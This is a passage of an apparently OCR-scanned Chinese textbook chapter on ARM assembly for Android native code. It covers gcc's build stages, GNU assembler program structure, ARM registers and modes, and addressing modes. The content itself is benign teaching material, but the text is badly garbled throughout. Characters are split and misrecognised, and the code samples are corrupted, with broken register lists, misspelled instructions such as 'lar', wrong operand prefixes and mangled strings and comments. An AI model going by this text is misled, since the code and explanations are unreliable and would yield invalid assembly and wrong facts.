量 ) ， 这 条 指令 的 含义 是 将 SP 寄存 器 的 值 减 去 8 后 重新 赋 给 SP 寄存 器 ， 作 用 
是 在 堆栈 上 分 配 8 个 字 节 的 空间 ， 也 就 是 栈 变 量 var_C 与 var_8 的 空间 。 

第 5-17 行 是 main 国 数 指令 部 分 。 整 段 代 码 涉及 到 8 条 指令 ， 下 面 简 单 地 
介绍 一 下 它们 的 功能 。 

第 5 行 的 STMEFD 与 第 17 行 的 LDMFD 是 堆栈 寻 址 指令 ，STMFD 指 令 用 于 
把 寄存 器 的 值 讨 入 堆栈 ， 在 本 实例 中 是 为 了 保护 原始 寄存 器 的 值 (因为 这 
些 寄存 器 在 下 面 可 能 会 被 使 用 ， 它 们 的 值 在 使 用 前 需要 保存 下 来 ， 在 程序 
返回 的 时 候 恢 复 ) ，LDMFD 指 令 用 于 从 堆栈 中 恢复 寄存 器 的 值 ， 作 用 与 
STMFD 恰 恰 相 反 。 

第 6 行 的 ADD 与 第 16 行 的 SUB 是 算术 指令 。ADD 为 加 法 指令 ，“ADD 
R11,SP, #4” 就 是 将 SP 寄存 器 的 值 加 4 后 赋 给 R11 青 存 器 。SUB 为 减法 指令 ， 
第 16 行 的 代码 功能 与 第 6 行 恰恰 相反 。 

第 8-9 行 的 STR 与 第 10 行 的 LDR 是 存储 器 访问 指令 。 存 储 器 指 的 就 是 内 
存 地 址 ， 通 常 也 可 以 称 为 内 存单 元 或 存储 单元 ， 存 储 器 的 访问 包含 从 存储 
器 中 读数 据 与 写 入 数据 到 存储 器 中 ，ARM 指 令 中 将 存储 器 使 用 一 对 中 括号 
“ 口 ?表示 ，STR 是 与 存储器 指令， 例如 第 8 行 的 “STR RO, [R11,#var_8]”* 就 是 指 
将 R0 寄 存 器 的 值 保存 到 栈 变量 var 8 中 ， 第 9 行 的 “STR R1, [R11,2var C]"Wil 
将 R1 寄 存 器 的 值 保 存 到 栈 变 量 var_C 中 。 

第 12 行 的 MOV 为 数据 处 理 指令 〈 部 分 书籍 将 其 称 为 数据 传送 指令 ) o 
它 用 于 寄存 器 间 的 数据 传送 ， 如 “MOV RO, R3” 表 示 把 R3 寄 存 器 的 值 赋 给 R0 


寄存 器 。 

第 13 行 的 BL 为 带 链接 的 跳 转 指令 。 完 成 类 似 其 它 编程 语言 中 子 程 序 调 
用 的 功能 ， 如 “BL puts” 就 是 调用 puts 国 数 。pnuts 为 标准 输入 输出 图 数 中 printf 
的 实现 ， 其 作用 是 向 标准 输出 设备 输出 指定 的 内 容 ， 本 实例 中 输出 的 内 容 
为 “Hello ARM” FRR. 

整 段 ARM 汇 编 代 码 就 是 经 典 的 Helloworld 程 序 ， 它 的 源码 如 下 。 


#include <stdio.h> 

int main(int argc, char* argv[]){ 
printf("Hello ARM!Wn"); 
return 0; 


) 


6.2.» ”原生 程序 的 生成 过 程 


原生 程序 采用 C/C++ 语 言 来 编写 ， 为 什么 到 了 逆向 分 析 的 时 候 却 变 成 了 
ARM 汇 编 代 码 呢 ? 

这 还 得 从 原生 程序 的 生成 过 程 说 起 。 原 生 程序 的 代码 是 由 Android NDK 
中 提供 的 交叉 编译 工具 链 中 的 gcc 编 译 器 来 编译 的 〈 所 谓 交 叉 编 译 工具 链 ， 
指 的 是 能 在 一 种 平台 上 编译 出 另 一 种 平台 上 运行 的 程序 的 工具 集合 ) 。 在 
Windows 或 Linux 上 使 用 Android NDK 中 的 gcc 编 译 的 原生 程序 可 以 直接 在 
Android 手 机 中 运行 ， 它 与 本 地 编译 是 相对 的 ， 本 地 编译 即 当前 平台 编译 ， 
编译 所 得 的 程序 只 能 在 当前 平台 上 运行 ， 通 常 ， 我 们 也 可 以 将 交叉 编译 称 
为 跨 平台 编译 。 

gcc 编 译 原 生 C 代 码 的 步骤 分 为 以 下 四 步 (C++ 代 码 由 g++ 来 编译 ) o 

1. 预 处 理 

在 这 个 阶段 中 ， 编 译 器 将 处 理 C 代 码 中 的 预 处 理 指令 ， 如 “#include” 包 
含 的 头 文件 会 全 部 被 编译 进来 ， 还 有 *“#kdefine” 预 定义 、 “其 如 预 条 件 处 理 等 也 
都 会 在 这 里 被 编译 器 处 理 。 详 细 的 输出 可 以 给 gcc 编 译 器 传递 “-E” 选 项 查 
看 。 以 上 一 小 节 的 hello 为 例 ， 执 行 “gcc -E hello.c -o hello. 记 后 hello.i 文 件 内 容 


如 下 (执行 以 上 命令 必须 确保 gcc 能 搜索 到 Android NDK 头 文件 路 径 ， 本 例 
实际 采用 make 工 具 的 编译 脚本 来 进行 编译 ， 具 体 参数 读者 可 以 参看 配套 源 
代码 中 本 小 节 实 例 的 makefile 文 件 ) 。 


4$ 1 "hello.c" 

4 1 "«built-in»" 

# 1 "«command-line»" 

# 1 "hello.c" 
*1"c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/stdio.h" 1 
# 41 "c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/stdio.h" 
# 1"c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/sys/cdefs.h" 1 
# 59 "c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/sys/cdefs.h" 
# 1 "c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/sys/cdefs . 
elf.h" 1 

# 60 "c:/android-ndk-r8/platforms/android-14/arch-arm/usr/include/sys/cdefs.h" 2 


static ^X inline int | sputc(int c, FILE * p) ( 


if (-- p-» w >= 0 || (_p->_w >= , p-» lbfsize && (char) c !- '\n')) 
return (* p-» ptt = c); 

else 

return ( swbuf( c, p)):; 


int main(int argc, char* argv[]l)( 
printf("Hello ARM!Mn"); 
return 0; 


) 

2. 编译 

在 这 个 阶段 中 ，gcc 编 译 器 首先 要 检查 代码 的 规范 性 ， 以 及 是 否 有 语法 
错误 等 ， 以 确定 代码 的 实际 要 做 的 工作 ， 在 检查 无 误 后 ，gcc 编 译 器 把 代码 
翻译 成 ARM 汇 编 语 言 的 代码 ， 可 以 为 gcc 编 译 器 传递 “-S” 选 项 查看 输出 。 以 
上 一 小 节 的 hello 为 例 ， 执 行 “gcc -S hello.i-o hello.s” 后 会 生成 hello.s 汇 编 文 
件 ， 它 的 内 容 如 下 。 


.arch armv5te 
.fpu softvfp 
.eabi attribute 20, 1 
.eabi attribute 21, 1 
.type main, function 
main: 
@ args = 0, pretend = 0, frame = 8 
G frame needed = 1, uses anonymous args = 0 
stmfd spl; tip; lr) 
add fp, sp, #4 
sub sp, sp, #8 
str r0, [fp, #-8] 
str r1, [fp, $-12] 
lar r3, .D3 
.L PICO: 
add r3; pc, r3 
mov r0, r3 
bl puts (PLT) 
mov r3, #0 
mov r0, r3 
sub sp, fp, #4 
ldmfd sp!, (fp, pc) 
细心 的 读者 会 发 现 ， 这 里 main 函 数 的 代码 与 6.2.1 小 节 分 析 的 内 容 基本 
相同 ! 其 实 没 错 ， 功 能 代码 的 确 如 此 ， 只 是 多 了 一 些 汇编 器 指令 与 标号 等 
信息 。 
3. 汇编 
这 个 阶段 gcc 编 译 器 会 调用 汇编 器 将 汇编 代码 汇编 成 二 进 制 目标 文件 。 
以 上 一 小 节 的 hello 为 例 ， 执 行 “gcc —c hello.s —o hello.o” AA hello.o HER 
文件 。 


4. 链接 


这 个 阶段 编译 器 会 调用 链接 器 将 二 进 制 的 目标 文件 链接 成 Android 平 台 
可 执行 的 ARM 原 生 程序 。 以 上 一 小 节 的 hello 为 例 ， 执 行 “gcc hello.o -o 
hello” 后 会 生成 hello 可 执行 文件 〈 其 实 还 需要 链接 其 它 的 目标 文件 ， 具 体 参 
数 参 见 本 小 节 makefile 脚 本 ) 。 

通过 上 面 4 个 阶段 的 分 析 可 以 发 现 ， 经 过 第 2 步 编 译 后 C 代 码 就 变 成 了 
ARM 汇 编 代 码 。 既 然 C 代 码 最 终 都 会 变 成 汇编 代码 ， 那 可 以 直接 编写 汇编 
代码 来 开发 ARM 原 生 程 序 吗 ? 

答案 是 肯定 的 ，Android NDK 支 持 直 接 使 用 ARM 汇 编 语言 编写 的 以 “.s” 
结尾 的 文件 作为 程序 的 源 文件 。 另 外 ， 开 发 人 员 还 可 以 使 用 C 代 码 与 ARM 
汇编 代码 混合 的 方式 来 编写 原生 程序 ， 这 与 Windows 平 台 或 Linux 平 台 的 汇 
编程 序 开发 是 相同 的 ， 具 体 的 实现 细节 此 处 不 再 展开 。 


6.2.3 ”必须 了 解 的 ARM 知 识 
在 开始 讲解 ARM 指 令 集 之 前 ， 我 们 先 来 看 看 ARM 汇 编 语言 的 一 些 特 


首先 是 ARM 汇 编 语 言 与 Java 语 言 的 区 别 。ARM 汇 编 语 言 是 一 门 * 低 级 ” 
语言 ， 它 能 够 与 系统 的 底层 打交道 ， 直 接 访问 底层 硬件 资源 ， 而 Java 语 言 为 
高 级 语言 ， 它 只 存在 于 框架 层面 ， 能 访问 的 资源 都 是 由 框架 提供 ; 其 次 ， 
ARM 汇 编 语 言 编写 的 程序 运行 速度 快 ， 占 用 内 存 少 ， 缺 点 是 编写 的 代码 难 
懂 ， 也 难以 维护 ， 而 Java 语 言 开 发 的 程序 运行 速度 相对 较 慢 ， 占 用 内 存 多 ， 
好 处 是 编写 的 代码 容易 理解 ， 开 发 效率 高 ;最 后 ，ARM 汇 编 语 言 编 写 的 程 
序 几 乎 不 需要 其 它 代码 的 转换 就 能 直接 运行 ， 源 码 与 反 编 译 出 来 的 代码 基 
本 相似 ， 而 Java 语 言 编 写 的 程序 需要 将 其 转换 成 特定 的 字 节 码 才能 在 
Android 虚 拟 机 中 运行 。 

其 次 是 ARM 汇 编 语 言 能 实现 什么 功能 。ARM 汇 编 语言 与 C 语 言 共 用 同 
一 套 原 生 程 序 开 发 的 API 接 口 ， 而 且 两 者 都 是 基于 模块 化 的 面向 过 程 的 编程 
思想 。 因 为 C 语 言 编写 的 代码 在 编译 时 有 一 个 过 程 是 将 其 转换 成 ARM 汇 编 
代码 ， 所 以 可 以 这 么 理解 : C 语 言 能 实现 的 功能 ARM 汇 编 语 言 都 能 实现 。 


最 后 是 ARM 汇 编 语 言 中 特有 的 寄存 器 。 寄 存 器 是 处 理 器 特有 的 高 速 存 
贮 部 件 ， 它 们 可 用 来 暂 存 指令 、 数 据 和 位 址 。 高 级 语言 中 用 到 的 变量 、 常 
量 、 结 构 体 、 类 等 数据 到 了 ARM 汇 编 语 言 中 ， 就 是 使 用 寄存 器 保存 的 值 或 
内 存 地 址 。 寄 存 器 的 数量 有 限 ，ARM 微 处 理 器 共有 37 个 32 位 寄存 器 ， 其 中 
31 个 为 通用 寄存 器 ，6 个 为 状态 寄存器。ARM 处 理 器 支持 七 种 运行 模式 ， 它 
们 分 别 为 : 

1. 用 户 模 式 (usr) : ARM 处 理 器 正常 的 程序 执行 状态 。 

2. 快速 中 断 模式 (fig) : 用 于 高 速 数 据 传输 或 通道 处 理 。 

3. 外 部 中 断 模式 (irq) : 用 于 通用 的 中 断 处 理 。 

4. 管理 模式 (svo) : 操作 系统 使 用 的 保护 模式 。 

5. 数据 访问 终止 模式 (abt) : 当 数 据 或 指令 预 取 终 止 时 进入 该 模式 ， 
i 

系统 模式 (sys) : 运行 具有 特权 的 操作 系统 任务 

Zs pre 令 中 止 模 式 (und) : 当 未 定义 的 指 令 执 行 时 进 并 入 该 模 
Ea 

ARM 处 理 器 的 运行 模式 可 以 通过 软件 改变 ， 也 可 以 通过 外 部 中 断 或 异 
常 处 理 改变 。 在 不 同 模式 下 ， 处 理 器 使 用 的 寄存 器 不 尽 相 同 ， 而 且 可 供 访 
问 的 资源 也 不 一 样 。 在 这 7 个 模式 中 ， 除 了 用 户 模式 外 ， 其 它 六 种 模式 均 为 
“特权 ”模式 ， 在 “特权 ”模式 下 ， 处 理 器 可 以 任意 访问 受 保 护 的 系统 资源 。 本 
书 将 要 讲解 的 ARM 程 序 逆 向 分 析 技 术 只 涉及 到 用 户 模 式 。 

在 用 户 模 式 下 ， 处 理 器 可 以 访问 的 寄存 器 为 不 分 组 寄存 器 RO0~~R7、 分 
组 寄存 器 R8 一 R14、 程 序 计 数 器 R15 (PC) 以 及 当前 程序 状态 寄存 器 
CPSR。 

ARM 处 理 器 有 两 种 工作 状态 : ARM 状 态 与 Thumb 状 态 。 处 理 器 可 以 在 
两 种 状态 之 间 随 意 切 换 。 当 处 理 器 处 于 ARM 状 态 时 ， 会 执行 32 位 字 对 齐 的 
ARM 指 令 ， 当 处 于 Thumb 状 态 时 ， 执 行 的 是 16 位 对 齐 的 Thumb 指 令 。 
Thumb 状 态 下 对 寄存 器 的 命名 与 ARM 有 部 分 差异 ， 它 们 的 关系 如 下 : 

e Thumb 状 态 下 的 R0~R7 与 ARM 状 态 下 的 R0~R7 相 同 。 

e Thumb 状 态 下 的 CPSR 与 ARM 状 态 下 的 CPSR 相 同 。 


e Thumb 状 态 下 的 FP 对 应 于 ARM 状 态 下 的 R11。 

e Thumb 状 态 下 的 IP 对 应 于 ARM 状 态 下 的 R12。 

e Thumb 状 态 下 的 SP 对 应 于 ARM 状 态 下 的 R13。 

e Thumb 状 态 下 的 LR 对 应 于 ARM 状 态 下 的 R14。 

e Thumb 状 态 下 的 PC 对 应 于 ARM 状 态 下 R15。 

寄存 器 可 以 通俗 的 理解 为 存放 东西 的 “ 储 物 柜 *”， 并 不 具备 其 它 的 功 
能 ， 代 码 能 实现 什么 功能 完全 是 由 处 理 器 的 指令 来 决定 的 。 例 如 想 完 成 一 
则 加 法 运算 ， 让 处 理 器 执行 ADD 加 法 指令 即 可 。 我 们 将 ARM 处 理 器 所 有 支 
持 的 指令 统称 为 ARM 指 令 集 ， 指 令 集 中 的 每 一 条 指令 都 有 着 自己 的 格式 ， 
在 编写 ARM 汇 编程 序 时 需要 严格 的 遵守 指令 规范 ， 详 细 的 指令 集 内 容 将 在 
6.5 小 节 进 行 介绍 。 


63 ”ARM 汇编 语言 程序 结构 


Android 平 台 的 ARM 汇 编 是 GNU ARM 汇 编 格 式 ， 使 用 的 汇编 器 (汇编 
器 的 功能 是 将 汇编 代码 转换 为 二 进 制 目标 文件 ) 为 GAS (GNU Assembler, 
GNU 汇 编 器 ) ， 它 有 着 一 套 自 己 的 语法 结构 。 读 者 可 以 访问 如 下 的 网 站 来 
查看 其 在 线 手册 : http://sourceware.org/binutils/docs/as/index.htmlo 

本 章 以 下 部 分 提 到 的 ARM 汇 编 均 是 指 GNU ARM 汇 编 。 


6.3.1 ”完整 的 ARM 汇 编程 序 


实例 代码 采用 6.2.2 小 节 的 hello.s 汇 编 文 件 进行 讲解 ， 它 的 内 容 如 下 。 
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.arch armv5te 

.fpu softvfp 

.eabi attribute 20, 
.eabi attribute 21, 
.eabi attribute 23, 
.eabi attribute 24, 
.eabi attribute 25, 
.eabi attribute 26, 
.eabi attribute 30, 
.eabi attribute 18, 
.file "hello.c" 
.rodata 


e 0 NM HB HR WwW HH 


.Section 
.align 2 


LOCO: 


.ascii "Hello ARM!\000" 
.text 

.align 2 

.global main 

.type main, £function 


main: 


@ args = 0, pretend = O0, 


@ 处 理 器 架构 
@ 协 处 理 器 类 型 
edi Lm FE 


@ 源 文件 名 

@ 声 明 只 读数 据 段 

@ 对 齐 方 式 为 2^2=4 字 节 

@ 标 号 LC0 

@ 声 明 字符 串 

@ 声 明代 码 段 (code section) 
@ 对 齐 方式 为 2^2=4 字 节 

@ 全 局 符号 main 
@main 类 型 为 函数 


@ 标 号 main 


frame = 8 


G frame needed = 1, uses anonymous args = 0 


stmfd  sp!, (fp, lr) 
add fp, sp, #4 

sub sp, sp, #8 

str r0, [fp, $-8] 

str r1, [fp, 94-12] 
Idr r3, .L3 


.LPICO: 


add r3, pc, r3 

mov r0, r3 

bl puts(PLT) 

mov r3, #0 

mov r0, r3 

sub sp, fp, #4 

ldmfd  sp!, (fp, pc) 


.L4: 


.align 2 


.L3: 


.word .LC0- (. LPICO«*8) 
.Size main, .-main 


.ident "GCC: (GNU) 4.4.3" 
.note.GNU-stack,"",$progbits 


.Section 


@ 将 fp、1r 寄 存 器 压 入 堆栈 

e@ 初 始 化 fp 寄存 器 ， 设 置 栈 帧 ， 用 于 访问 局 部 变量 
e 开 辟 栈 空间 

@ 保 存 第 一 个 参数 

@ 保 存 第 二 个 参数 

@ 取 标号 .43 处 的 内 容 ， 即 “Hello GAS” 的 偏 移 地 址 
@ 标 号 .LPICO 

@ 计 算 字符 串 “Hello GAS” 的 内 存 地 址 

@ 设 置 参数 1 

@ 调 用 puts 函 数 

@ 设 置 r3 寄 存 器 的 值 为 0 

@ 程 序 返 回 结 果 为 0 

@ 恢 复 sp 寄存 器 的 值 

e@ 恢 复 Ep 寄 存 器 ， 并 将 lz 寄存 器 值 赋 给 pc 寄存 器 
@ 标 号 .L4 

@ 对 齐 方 式 为 2^2=4 字 节 

eb .L3 

@ 保 存 字符 串 相 对 “aaqa r3, pc, r3" ØMME i 
emain 函 数 的 大 小 为 当前 代码 行 减 去 main 标 号 

@ 编 译 器 标识 

@ 定 义 .note.GNU-stack 段 


整个 hello.s 汇 编 文 件 虽 然 比 较 短 ， 但 包含 了 ARM 汇 编程 序 的 整个 框 
架 。 一 个 完整 的 ARM 汇 编程 序 包 括 处 理 器 架构 定义 、 数 据 段 、 代 码 段 与 
main 遂 | 数 。 接 下 来 我 们 通过 这 个 例子 来 逐 段 的 介绍 ARM 汇 编程 序 的 结构 。 


6.3.2 ”处 理 器 架构 定义 


程序 的 开头 代码 语句 为 : 

.arch armv5te @ 处 理 器 架构 
.fpu softvfp @ 协 处 理 器 类 型 
.eabi attribute 20, @ 接 口 属性 

,eabi attribute 21, 

.eabi attribute 23, 

.eabi attribute 24, 

.eabi attribute 25, 

.eabi attribute 26, 

.eabi attribute 30, 

.eabi attribute 18, 

这 些 指 令 指定 了 程序 使 用 的 处 理 器 架构 、 协 处 理 器 类 型 与 接口 的 一 些 
属性 。 

.arch 指 定 了 ARM 处 理 器 架构 。armv5te 表 示 本 程序 的 代码 可 以 在 armv5te 
架构 的 处 理 器 上 运行 ， 除 此 之 外 ， 它 还 可 以 是 armv6、armv7-a 等 ， 不 同 的 
处 理 器 架构 支持 的 指令 集 不 同 ， 如 果 代 码 中 使 用 了 指定 处 理 器 架构 不 支持 
的 指令 ， 代 码 在 编译 时 会 报错 。 

.fpu 指 定 了 协 处 理 器 的 类 型 。softvfp 表 示 使 用 浮 点 运算 库 来 模拟 协 处 理 
器 运算 ， 之 所 以 会 出 现 这 个 选项 ， 是 因为 很 多 时 候 为 了 节省 处 理 器 的 生产 
成 本 ， 出 厂 的 ARM 处 理 器 中 不 带 协 处 理 器 单元 ， 所 有 的 浮 点 运算 只 能 通过 
软 模拟 的 形式 来 完成 ， 在 对 硬件 条 件 没 有 要 求 的 情况 下 ， 可 以 使 用 这 个 保 
守 选 项 ， 另 外 ， 还 可 以 给 .fpu 赋 值 为 vfpv2、vfpv3 来 指定 使 用 处 理 器 自 带 的 
协 处 理 器 。 


DP 


.eabi attribute 指定 了 一 些 接口 属性 。EABI (Embedded Application 
Binary Interface, WARMA HAO) 是 ARM 制 定 的 一 套 接口 规范 ， 
Android 系 统 实现 了 它 ， 此 处 的 属性 值 在 编译 多 数 程序 时 都 是 固定 的 ， 但 笔 
者 在 相关 文档 中 没有 找到 其 含义 描述 ， 故 此 不 再 深究 。 


6.3.3 REX 


程序 中 段 的 概念 大 概要 追溯 到 远古 的 DOS 时 代 了 ， 现 在 的 高 级 语言 很 
少 直 接 使 用 到 段 ， 这 些 都 是 由 编译 器 来 自动 生成 的 。 像 C 语 言 中 使 用 到 的 全 
局 变量 、 常 量 等 信息 编译 器 都 会 将 其 编译 到 一 个 名 为 “.data” 的 数据 段 中 ， 如 
果 细 分 的 话 ， 常 量 数据 会 被 编译 到 名 为 “.rodata” 的 只 读数 据 段 中 ， 这 些 数 据 
段 都 是 不 可 执行 的 ， 而 代码 则 会 编译 到 名 为 “.text* 的 代码 段 中 。ARM 汇 编 
使 用 “.section” 指 令 来 定义 段 (section 原 义 为 区 段 ， 有 些 书 籍 中 解释 为 节 区 ， 
读者 在 此 不 必 计 较 ， 理 解 其 含义 即 可 ) ， 它 的 格式 为 : 

.section name [, "flags"[, %typel,flag_specific_arguments]]] 

name 为 段 名 ，flags 为 段 的 属性 如 读 、 写 、 可 执行 等 ，type 指 定 了 段 的 类 
型 ， 如 progbits 表 示 段 中 包含 有 数据 、note 表 示 段 中 包含 的 数据 非 程 序 本 身 
使 用 ，flag_specific_arguments 指 定 了 一 些 平 台 相 关 的 参数 。 

本 实例 定义 了 三 个 段 : 

* section .rodata” 定 义 只 读数 据 段 ， 属 性 采用 默认 。 

“text” 定 义 了 代码 段 ， 没 有 使 用 .section 关 键 字 。 

* section .note.GNU-stack,"",%progbits” 定 义 .note.GNU-stack 段 ， 它 的 作 
用 是 禁止 生成 可 执行 堆栈 ， 用 来 保护 代码 安全 ， 可 执行 堆栈 常常 被 用 来 引 
发 堆栈 溢出 之 类 的 漏洞 ， 关 于 这 方面 的 探讨 读者 可 以 阅读 软件 漏洞 研究 方 
面 的 书籍 。 


63.4 ”注释 与 标号 


为 程序 编写 注释 是 一 个 恨 好 的 编程 习惯 ，GNU ARM 汇 编 支 持 两 种 在 代 
码 中 添加 注释 的 方法 。 

第 一 种 为 C 语 言 中 的 %/* */” 型 注释 ， 在 %/*” 与 “*/” 之 间 包 含 的 所 有 内 容 都 
会 被 汇编 器 认定 为 注释 ， 例 如 下 面 的 代码 : 

人 * 这 里 为 main 郁 效 的 起 始 位 置 */ 


“/* #/" 型 注释 多 用 于 大 批量 的 注释 ，GNU ARM 还 支持 单行 代码 注释 ， 
方法 是 在 代码 的 最 后 使 用 符号 <*@” 开 头 ，6.3.1 小 节 的 代码 就 采用 此 种 方法 进 
行 注释 。 

在 ARM 汇 编 代码 中 ， 标 号 是 十 分 常见 的 。 当 在 程序 中 使 用 跳 转 指令 进 
行 跳 转 的 时 候 ， 可 以 使 用 标号 作为 跳 转 的 目的 地 ， 汇 编 器 在 编译 时 会 将 标 
号 转换 为 地 址 。 标 号 的 声明 方法 是 : 


<H 5 A> : 
如 下 面 的 代码 就 是 一 个 简单 的 循环 。 
LOOP : 


SUB RO, RO, #1 
CMP RO, #0 
BNE LOOP 


6.3.5 ”汇编 器 指令 


程序 中 所 有 以 点 “. ”开头 的 指令 都 是 汇编 器 指令 ， 汇 编 器 指令 是 与 汇编 
器 相关 的 ， 它 们 不 属于 ARM 指 令 集 。GAS 汇 编 器 支持 的 汇编 器 指令 比较 
多 ， 在 GAS 在 线 文 档 的 第 7 章 “Assembler Directives” 中 列 出 了 所 有 的 汇编 器 
指令 。 

本 实例 使 用 到 的 汇编 器 指令 

file: 指定 了 源 文件 名 。 实 例 hello.s 是 从 hello.c 编 译 得 来 的 ， 手 写 汇编 
代码 时 可 以 忽略 它 。 


align: 指定 代码 对 齐 方式 ， 后 面 跟 的 数值 为 2 的 次 数 方 。 如 “.align 4” 表 
示 2^4=16 字 节 对 齐 。 

.ascii; 声明 字符 串 。 

.global: 声明 全 局 符号 。 全 局 符号 是 指 在 本 程序 外 可 以 访问 的 符号 。 

type: 指定 符号 的 类 型 。“.type main, %function” 表 示 main 符 号 为 国 数 。 

word: 用 来 存放 地 址 值 。“.word .LC0-(.LPIC0+8)” 存 放 的 是 一 个 与 地 址 
无 关 的 偏 移 量 。 

Size: 设置 指定 符号 的 大 小 。“.size main, .-main” 中 的 点 “.” 表 示 当 前 地 
址 ， 减 去 main 符 号 的 地 址 即 为 整个 main 为 数 的 大 小 。 

.ident: 编译 器 标识 ， 无 实际 用 途 ， 生 成 可 执行 程序 后 它 的 值 被 放置 到 


“comment” fg, 


6.3.6” 子 程序 与 参数 传递 


子 程序 在 代码 中 用 来 完成 一 个 独立 的 功能 ， 很 多 时 候 子 程序 与 遂 数 是 
相同 的 概念 。ARM 汇 编 中 声明 函数 的 方法 如 下 : 
global | (HZ 
.type EZ E, "ofunction 
H2 E: 
«BR 
例如 声明 一 个 实现 两 个 数 相 加 的 函数 的 代码 为 : 
.global MyAdd 
.type MyAdd, $function 
MyAdd: 
ADD r0, r0, r1 e 两 个 参数 相 加 
MOV pc, lr QKGI 
既然 是 函数 调用 ， 就 肯定 存在 图 数 参数 传递 的 问题 。ARM 汇 编 中 规 
E: R0-R3 这 4 个 寄存 器 用 来 传递 函数 调用 的 第 1 到 第 4 个 参数 ， 超 出 的 参数 


通过 堆栈 来 传递 。R0 寄 存 器 同时 用 来 存放 函数 调用 的 返回 值 。 被 调用 的 函 
数 在 返回 前 无 须 恢复 这 些 寄存 器 的 内 容 。 


64 ARM 处 理 器 寻 址 方式 


处 理 器 寻 址 方式 是 指 通 过 指令 中 给 出 的 地 址 码 字段 来 寻找 真实 操作 数 
地 址 的 方式 。 尽 管 ARM 处 理 器 采用 的 是 精简 指令 集 ， 但 指令 间 的 组 合 灵活 
度 却 比 x86 处 理 器 要 高 ，x86 处 理 器 支持 七 种 寻 址 方式 ， 而 ARM 处 理 器 支持 
九 种 寻 址 方式 。 


6.4.1 ”立即 寻 址 


立即 寻 址 是 最 简单 的 一 种 寻 址 方式 ， 大 多 数 的 处 理 器 都 支持 这 种 寻 址 
方式 。 立 即 寻 址 指令 中 后 面 的 地 址 码 部 分 为 立即 数 〈 即 常量 或 常数 ) ， 立 
即 寻 址 多 用 于 给 寄存 器 赋 初 值 。 并 且 立 即 数 只 能 用 于 源 操作 数字 段 ， 不 能 
用 于 目的 操作 数字 段 。 例 如 : 

MOV RO, 41234 

目 令 执行 后 RO0=1234。 立 即 数 以 “ 拓 作 为 前 缀 ， 表 示 十 六 进 制 数 值 时 以 
“0x” 开 头 ， 如 #0x20。 


6.4.2 ”寄存 器 寻 址 


寄存 器 寻 址 中 ， 操 作 数 的 值 在 寄存 器 中 ， 指 令 执 行 时 直接 从 寄存 器 中 
取 值 进行 操作 。 例 如 : 


MOV RO, R1 
自 令 执行 后 RO=R1。 


6.4.3 ”寄存 器 移 位 寻 址 


寄存 器 移 位 寻 址 是 ARM 指 令 集 特 有 的 寻 址 方式 ， 寄 存 器 移 位 寻 址 与 寡 
存 器 寻 址 类 似 ， 只 是 在 操作 前 需要 对 产 寄 存 器 操作 数 进 行 移 位 操作 。 
寄存 器 移 位 寻 址 支持 以 下 五 种 移 位 操作 : 
LSL: 逻辑 左 移 ， 移 位 后 寄存 器 空 出 的 低位 补 0。 
LSR: 逻辑 右 移 ， 移 位 后 寄存 器 空 出 的 高 位 补 0。 
ASR: 算术 右 移 ， 移 位 过 程 中 符号 位 保持 不 变 ， 如 果 源 操作 数 为 正 
则 移 位 后 空 出 的 高 位 补 0， 否 则 补 1。 
ROR: 循环 右 移 ， 移 位 后 移出 的 低位 填 入 移 位 空 出 的 高 位 。 
RRX: 带 扩展 的 循环 右 移 ， 操 作 数 右 移 一 位 ， 移 位 空 出 的 高 位 用 C 标 志 
的 值 填 充 。 

例如 : 

MOV RO, R1, LSL #2 

指令 的 功能 是 将 R1 寄 存 器 左 移 2 位 ， 即 “R1 < 2” 后 赋值 给 R0 寄 存 器 ， 
站 令 执行 后 R0=R1*4。 


64.4 ”寄存 器 间接 寻 址 


寄存 器 间接 寻 址 中 地 址 码 给 出 的 寄存 器 是 操作 数 的 地 址 指针 ， 所 需 的 
操作 数 保 存在 寄存 器 指定 地 址 的 存储 单元 中 。 例 如 : 

LDR RO, [R1] 

指令 的 功能 是 将 R1 寄 存 器 的 数值 作为 地 址 ， 取 出 此 地 址 中 的 值 赋 给 R0 
寄存 器 。 


6.4.5 “” 基 址 寻 址 


基 址 寻 址 是 将 地 址 码 给 出 的 基 址 寄存 器 与 偏 移 量 相 加 ， 形 成 操作 数 的 
有 效 地 址 ， 所 需 的 操作 数 保存 在 有 效 地 址 所 指向 的 存储 单元 中 。 基 址 寻 址 
多 用 于 碍 表 、 数 组 访问 等 操作 。 例 如 : 


LDR RO, [R1, 4-4] 


效 


指令 的 功能 是 将 R1 寄 存 器 的 数值 减 4 作为 地 址 ， 取 出 此 地 址 的 值 赋 给 R0 
寄存 器 。 


6.4.6 ”多 寄存 器 寻 址 
多 寄存 器 寻 址 一 条 指令 最 多 可 以 完成 16 个 通用 寄存 器 值 的 传送 。 例 


LDMIA RO, (R1, R2, R3, R4) 

LDM 是 数据 加 载 指令 ， 指 令 的 后 缀 IA 表 示 每 次 执行 完 加 载 操 作 后 R0 寄 
存 器 的 值 自 增 1 个 字 ，ARM 指 令 集 中 ， 字 表示 的 是 一 个 32 位 的 数值 。 这 条 指 
令 执 行 后 ，R1=[R0]，R2=[RO+#4]，R3=[RO+#8]，R4=[RO+#12]。 


6.4.7 ”堆栈 寻 址 


堆栈 寻 址 是 ARM 处 理 器 特有 的 一 种 寻 址 方式 ， 堆 栈 寻 址 需要 使 用 特定 
的 指令 来 完成 。 堆 栈 寻 址 的 指令 有 LDMFA/STMFA、LDMEA/STMEA、 
LDMFD/STMFD. LDMED/STMED。 

LDM 和 STM 为 指令 前 缀 ， 表 示 多 寄存 器 寻 址 ， 即 一 次 可 以 传送 多 个 寡 
存 器 值 。FA、EA、FD、ED 为 指令 后 级 ， 详 细 的 指令 介绍 请 参看 6.5.3 小 \ 


-Hr- 
"He 


堆栈 寻 址 举例 : 
STMFD SP!, (R1-R7, LR) @ 将 R1~R7，LR 入 栈 。 多 用 于 保存 子 程序 “现场 ” 
LDMFD SP!, (R1-R7, LR) @ 将 数据 出 栈 ， 放 入 R1~R7，LR 寄 存 器 。 多 用 于 恢复 子 程序 “现场 ” 


6.4.8” 块 拷贝 寻 址 


块 拷贝 寻 址 可 实现 连续 地 址 数据 从 存储 器 的 某 一 位 置 拷贝 到 另 一 位 
置 。 块 拷贝 寻 址 的 指令 有 LDMIA/STMIA 、 LDMDA/STMDA 、 
